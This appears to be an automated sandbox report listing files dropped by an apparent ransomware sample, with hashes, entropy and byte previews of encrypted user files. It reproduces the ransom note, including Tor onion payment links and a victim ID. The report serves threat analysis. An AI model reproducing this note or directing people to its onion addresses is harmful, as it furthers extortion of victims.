                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Searches\Everywhere.search-ms
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.832298503973559
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:DP7bcp9c0Dhi+LxzK8sevWAVgKTaCB7RZ0cHYIgtyUzjD:DP7icohhxzCwgck38y
                                                                                                                                                      MD5:B37FA5CD4EDF0FBC39F3097249E8ED64
                                                                                                                                                      SHA1:7A5A690C327E20F24B642159238FC64572F4D3B7
                                                                                                                                                      SHA-256:2348B2BC3D49CE00049E8504CF0E4CFA4E1261AADE765255ED72957C4B4B9275
                                                                                                                                                      SHA-512:7AC0D7D2CBE70631E3DE225C872DE369F45EC3D7349FF2273828F021C3C2BE7FDE8EE1E5738A66E750CCD8866548845CF2E131F6B148CD445A242E82C3A642D8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{..K.`2y.R....;.Q.._..X..ZWp.~.5g..08,..H...Y.`.....d.<..n`D-..._e.1....F.3...KZ.a..-L...K1...*.S.p.Z......,..{t...k.2eHs!:l.8.......`....V...7g,..)vV..#!.......S.:B.<.-.&.......$uG...c.6.N.V.X.....p4Y...6...y ...~.."?..O.|...C.........b8..7G.Lad.........p@W.G.*4y. .x[6.u.. K..I...7q.`.Z.i.tO.*...Y......=N....d...2.L1...a.......H>M..G.|G.H.6.F.>....*...?2.E267 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\Searches\Everywhere.search-ms.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.832298503973559
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:DP7bcp9c0Dhi+LxzK8sevWAVgKTaCB7RZ0cHYIgtyUzjD:DP7icohhxzCwgck38y
                                                                                                                                                      MD5:B37FA5CD4EDF0FBC39F3097249E8ED64
                                                                                                                                                      SHA1:7A5A690C327E20F24B642159238FC64572F4D3B7
                                                                                                                                                      SHA-256:2348B2BC3D49CE00049E8504CF0E4CFA4E1261AADE765255ED72957C4B4B9275
                                                                                                                                                      SHA-512:7AC0D7D2CBE70631E3DE225C872DE369F45EC3D7349FF2273828F021C3C2BE7FDE8EE1E5738A66E750CCD8866548845CF2E131F6B148CD445A242E82C3A642D8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{..K.`2y.R....;.Q.._..X..ZWp.~.5g..08,..H...Y.`.....d.<..n`D-..._e.1....F.3...KZ.a..-L...K1...*.S.p.Z......,..{t...k.2eHs!:l.8.......`....V...7g,..)vV..#!.......S.:B.<.-.&.......$uG...c.6.N.V.X.....p4Y...6...y ...~.."?..O.|...C.........b8..7G.Lad.........p@W.G.*4y. .x[6.u.. K..I...7q.`.Z.i.tO.*...Y......=N....d...2.L1...a.......H>M..G.|G.H.6.F.>....*...?2.E267 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\Searches\Indexed Locations.search-ms
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.849424734612018
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Bo3ONeVbX3MKzK8sevWAVgKTaCB7RZ0cHYIgtyUzU7Ln:C3xMKzCwgck38f/n
                                                                                                                                                      MD5:CBDC01106636ECADD6194042DA7858DD
                                                                                                                                                      SHA1:A92056641136C81C439167E90A117AC6524C0F47
                                                                                                                                                      SHA-256:FCE74B51A860A4F4145C10C65E6D9D72398C32A05096888227325B62BFA51C87
                                                                                                                                                      SHA-512:4F711C3F1E90FE9F37BBFC472E26BD2629EDCCD4EAF5A877CC9B59866290574D97FD6C73DC4FD354983C7A20CB29B7824B76414DBD5C0F108CB93C18A7283304
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ^vR"rh.a.'...>..>......E...<......`.a|~e.u......%...........\.dM..~......D.u.Wb.,.h3.Z.P,r.!.S2....O.....T9=..{d....4.7...D0.&....o&.*B1..-.6.a.......N....[.../.,.J}...3X.....&}.im0O...4...B20.}i.wNT}5M..b.....P.e.@.e.$...n...W...8...7...<PCio.S.....Y...ug...R.....o,.7;...Z.,......nI2os....hy.,...L.)....LM}.j."..W)...t....gh....g.......{n..TD6....!}a.$..S.L.&...\...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\Searches\Indexed Locations.search-ms.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.849424734612018
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Bo3ONeVbX3MKzK8sevWAVgKTaCB7RZ0cHYIgtyUzU7Ln:C3xMKzCwgck38f/n
                                                                                                                                                      MD5:CBDC01106636ECADD6194042DA7858DD
                                                                                                                                                      SHA1:A92056641136C81C439167E90A117AC6524C0F47
                                                                                                                                                      SHA-256:FCE74B51A860A4F4145C10C65E6D9D72398C32A05096888227325B62BFA51C87
                                                                                                                                                      SHA-512:4F711C3F1E90FE9F37BBFC472E26BD2629EDCCD4EAF5A877CC9B59866290574D97FD6C73DC4FD354983C7A20CB29B7824B76414DBD5C0F108CB93C18A7283304
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ^vR"rh.a.'...>..>......E...<......`.a|~e.u......%...........\.dM..~......D.u.Wb.,.h3.Z.P,r.!.S2....O.....T9=..{d....4.7...D0.&....o&.*B1..-.6.a.......N....[.../.,.J}...3X.....&}.im0O...4...B20.}i.wNT}5M..b.....P.e.@.e.$...n...W...8...7...<PCio.S.....Y...ug...R.....o,.7;...Z.,......nI2os....hy.,...L.)....LM}.j."..W)...t....gh....g.......{n..TD6....!}a.$..S.L.&...\...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\Searches\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1472
                                                                                                                                                      Entropy (8bit):6.461579913433688
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KgUQGdYOm3OMAUhCjAG1nvVydOb2/nzK8sevWAVgKTaCB7RZ0cHYIgtyUzFaQn:HUfdYl+lQ7GRvVIO0nzCwgck38EaQn
                                                                                                                                                      MD5:BB12EE70F1F44D3BCBABBC372D555D65
                                                                                                                                                      SHA1:8FC3CA0EA0020D0AF54751BDDF813558C3AEF9B1
                                                                                                                                                      SHA-256:14E594AD6D30DA126B04325982067152C9FE8100583206D0E886ED5A54CFBE2C
                                                                                                                                                      SHA-512:46448A83FEE1CDE73FE326974BD0D0A2CE8AC8596F79E9DADDFA609BC98E640717F7D98FE0ED95BBB98D6A8E2F480FBA0B01F4E394E6D1F0ED366E9187CA9E71
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .Vq.".....t..Jo..{......a..m.....|..........&..@._/....[..%.7pVS.....H........"f....c.eX.a_Mt._.5...(.q..[_..r...$}S.^L...^"K.......Fk.<n.....~..}cQ..a..n...[.eD.r.A]"..B.....zf..;]..........U<B..hi....[..C........Er+p`. ...%..y/*`.k./.J'.nk.....HG.}...n.r...~.q....G....!.<.Ue.:...N........v.?.......'...cKu...l..^.N..y.~YK../p;K.aY...:..b.......U...=..L....k.W...53K.M.h.U^N.Kg)..C:A..D..S|.E............:|%.....z.v%F..U.-D{...{J..7..e.( .`.D{ZQN..1...4.s.....G.^.....n2.O.z..O..$Vn..k.G..=a....q.+...1..Aae.n.>....b.}k)...B`[:.?.<...&..'..#6SY.$E.)...//...~..m....8...".5.....N.t.`#C~2#v>,...]b-..l$.....<..Y4p....|1+.P....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5
                                                                                                                                                      C:\Users\user\Searches\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1472
                                                                                                                                                      Entropy (8bit):6.461579913433688
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KgUQGdYOm3OMAUhCjAG1nvVydOb2/nzK8sevWAVgKTaCB7RZ0cHYIgtyUzFaQn:HUfdYl+lQ7GRvVIO0nzCwgck38EaQn
                                                                                                                                                      MD5:BB12EE70F1F44D3BCBABBC372D555D65
                                                                                                                                                      SHA1:8FC3CA0EA0020D0AF54751BDDF813558C3AEF9B1
                                                                                                                                                      SHA-256:14E594AD6D30DA126B04325982067152C9FE8100583206D0E886ED5A54CFBE2C
                                                                                                                                                      SHA-512:46448A83FEE1CDE73FE326974BD0D0A2CE8AC8596F79E9DADDFA609BC98E640717F7D98FE0ED95BBB98D6A8E2F480FBA0B01F4E394E6D1F0ED366E9187CA9E71
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .Vq.".....t..Jo..{......a..m.....|..........&..@._/....[..%.7pVS.....H........"f....c.eX.a_Mt._.5...(.q..[_..r...$}S.^L...^"K.......Fk.<n.....~..}cQ..a..n...[.eD.r.A]"..B.....zf..;]..........U<B..hi....[..C........Er+p`. ...%..y/*`.k./.J'.nk.....HG.}...n.r...~.q....G....!.<.Ue.:...N........v.?.......'...cKu...l..^.N..y.~YK../p;K.aY...:..b.......U...=..L....k.W...53K.M.h.U^N.Kg)..C:A..D..S|.E............:|%.....z.v%F..U.-D{...{J..7..e.( .`.D{ZQN..1...4.s.....G.^.....n2.O.z..O..$Vn..k.G..=a....q.+...1..Aae.n.>....b.}k)...B`[:.?.<...&..'..#6SY.$E.)...//...~..m....8...".5.....N.t.`#C~2#v>,...]b-..l$.....<..Y4p....|1+.P....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5
                                                                                                                                                      C:\Users\user\Searches\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\SendTo\Bluetooth File Transfer.LNK.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2000
                                                                                                                                                      Entropy (8bit):7.010498724898928
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2Q7myrZrtzJNTMbuDTZTWPs+zCwgck38G:2Q79HJ5M6TZTD+zTEJ
                                                                                                                                                      MD5:9322F4C74E81410D40743859931EA0B5
                                                                                                                                                      SHA1:743865FE9F1E60C5E1F47205C08729C49EC2F9A3
                                                                                                                                                      SHA-256:70A320E4752DB21B4ABB4B7BF246EC21D4AAB7CFEE0BD4A3E7DA209D0CE0F4E1
                                                                                                                                                      SHA-512:F1445BC3874048F225C41A6B352C8C104018118792155B2806225943F36435036A781F3D564C91880C90F4F5EE7C7AD953BD01B10DB1F5D19D8A13228A591366
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...z...R..;eo..[...*..p..`4m...%d5...4.@.D.L.F...[....|...p...b..6V....s..sd2 .V......X..R..c..z6..u4..>2..f.~.x...rrh.0.'..?...._|._..#...... -'...h......O.33....6.C.n.~h.X..J#...>...<.c..E....k.....CJ[..`.Y..g.M.2VOAa!......*.._s...!...\.4.........F.....q.:.!3..O..K...3....].5.#P../W,...$hF})..@.tw.....s.iG%.:..Tqm..%.b....?g..@..].i(0...P8...h. ....I.c..M#.%.z.3....;.<.K.~Q..i$n.....p....SnIHv;...OX.uA..6..{...+.r.p..F+........X..'............BW....?I..Bzj..`Y..s...^..O.@.|A........L9d.0.",.0....p....$.....K... .q.c.s;...s.Kf...Ea(.:q9.0"k.|.z..].I"..M1u<..W-...&.$r.*"<...a.....5..O..+.....Z......t.*.d:.F7.NAG.A.......V...5[e..f.... +l..A..v..D.G!../..*.....RT....6G.NF..xi.S..J.....O./u$0xn....o...[...?.wv..\.d..h .3L.Y..+!\.TJ:Q.Na.E...W{..ae..g..r.8.. s.{....`....3Ce..>l`..0....3xb'....3.bu.q."$.n.+.r..5..l}.y.9.B9u8......c!.47.6..R.;s.K.....$........Fo.KD....4..<wrp.'4.g..Q..4.l.....P\.#..(....^....?.Q%.3.b.iVn. .. ....+c.....
                                                                                                                                                      C:\Users\user\SendTo\Compressed (zipped) Folder.ZFSendToTarget.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):5.019063342556034
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1kLLJJEA9dzK8sevWAVgKTaCB7RZ0cHYIgtyUzQsaa0:1qJuidzCwgck38nsG
                                                                                                                                                      MD5:D6B37E161675BBC18FE78AC23A8E1A40
                                                                                                                                                      SHA1:B89E2F9D4B77A987816E0D6F8CADB94254E6D8C0
                                                                                                                                                      SHA-256:C05C8BF10A63D32F4112F0159294AD5900514133B50B9357E1945F3E42F7C998
                                                                                                                                                      SHA-512:9F6788B2A9BD32B9DF786050A4190353D1F9CC7377A67B36AD6BF06D4216B5EDC06D8F81783689DD7592879C38A7C6708AEE474BB60154720199C8E2D1D0C5DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ........0S..s..............3...s.#..k....N.l..:...kH[.V#.<...V.V....r[,..$..z.u.L,*...".0DQ...R..X9...<Z.....k.ey.T.......x..`.oQ..1.T.|u67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.u..I.;w.>G.'.i_ ._......yv.*.......|...cbW..ti.
                                                                                                                                                      C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.975750997590821
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:c63IQqzK8sevWAVgKTaCB7RZ0cHYIgtyUz4xA:GQqzCwgck38m
                                                                                                                                                      MD5:CAB971420B54B0370D35CDF0A680A3BB
                                                                                                                                                      SHA1:D3CB20F66F4F337A57AB8F91B5DC8BB05329A5EF
                                                                                                                                                      SHA-256:35A95820FDC97BC13A0CA23134F86744257CF66A67964ADBD4B745F66554E00D
                                                                                                                                                      SHA-512:F0A81914586E57BB45317B47D0677E2F77C9412DDECCE6D971363D046D618E45A8CF7AD70C8D0275CABB0F1FA62B81C3348201BECA5DC4635EDE20C9C1076F14
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .S.~y...wX../+}_[".+,.L.*.v[.. ..sf..m.dmt@.\.....w.......Q..~.........E.$.x8..Su.....'.4.-I..oD..`..v......{....7.-.Y....2.Iz..?|4..c...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...7]'v..6.m.k..5.f.'1o_e.d...........Q'...q..7.
                                                                                                                                                      C:\Users\user\SendTo\Desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1648
                                                                                                                                                      Entropy (8bit):6.690033380246828
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:DHkuOcXBeqKW+LH7R7UrLhPEmxJKxcY/4N7QqmMVN+KzK8sevWAVgKTaCB7RZ0cR:7njXBQW+LbR7MouRX+KzCwgck383
                                                                                                                                                      MD5:F76F037D2E0076D8FB410659B65E2F5B
                                                                                                                                                      SHA1:0FEEBDCB25ED8B641B7A837EEDDAEF61E12BB8F8
                                                                                                                                                      SHA-256:74A67E6727BCFBD1AC6E50F35B555AA2D2819E3F18B1950B4060BDCE47695AEC
                                                                                                                                                      SHA-512:BCD221377069EADA3237A3C9AE20DC30E6ADCA6AD672A81F47BE05CED05B614EC45565B58CBA5987B8D8F24285B85E214B7B2305B679996163813E381866A2E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .a..b.@.0......DJ..9I4y..SR@..K.,....,d.#.2$...Up.,CD....."T.....f.].y...>..$.>.........U..~..K.k..e%.jP&.+...~.}._..."W...l..y..g.=..?..........#....V...].W..8\9M.s..y..s......_.e...W.I..js..d?./>$h.@..F.b.k...-%..v...Z.....i.&F..s.Lr.k..H...jU."...\1.hz[]`H..........'...>..pJ.v...-&.5....X.!P.'..~."+.......B..4...R..X.H....;..RCf?...R.[v...../:....I.b0X._...#X.7...V3.?o..!.L..MaXiD...R.>~j.2.[6.....f..5_........83.l..X.E...._.(..J:.<A........&u...t.}`....,~....m...%.^1<.q..%.Yipk ...S.]K!.......=.3.......`dc...to.Z~...c....T .R_.k..w.QRv....x..I-..C...f....k...t.H.K.......u.^.E%...[CR......[:.kZ.......R..U.>.....~.v...qP....k........U.o8.E.@.Xd.........ga..A..8.oDn..+..q...g.ip.)w7.....f... w..](..s.c/*'9....>....p|...2.-..2....,7.._h".x$$..\..2..9.=...6...|...!..7.1.8.!^H.r...967 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E
                                                                                                                                                      C:\Users\user\SendTo\Fax Recipient.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.084249697663168
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:9gMlfZgI8UzDxjztZS+WGyg5K/VHSaxzCwgck383fZ:NL8oDFJFysK/pxzTEefZ
                                                                                                                                                      MD5:9D56323F354B2C9F18182065E85C969D
                                                                                                                                                      SHA1:5DE40E85A227425C03F80B6785EB6CA1C2F88247
                                                                                                                                                      SHA-256:6897F3D5238A18A1001369A81D9E527A7A1CED81B3A7DB171BB2D39796B03E08
                                                                                                                                                      SHA-512:477CA759E7F928C3CE45D8204CB777E1265196A5565E9A7C154322D6B6272FDB0388F39BA6CDE7553F56D6DF03AF6F38533B8C01B3BE0B59C4CDA53739B5BE91
                                                                                                                                                      Malicious:false
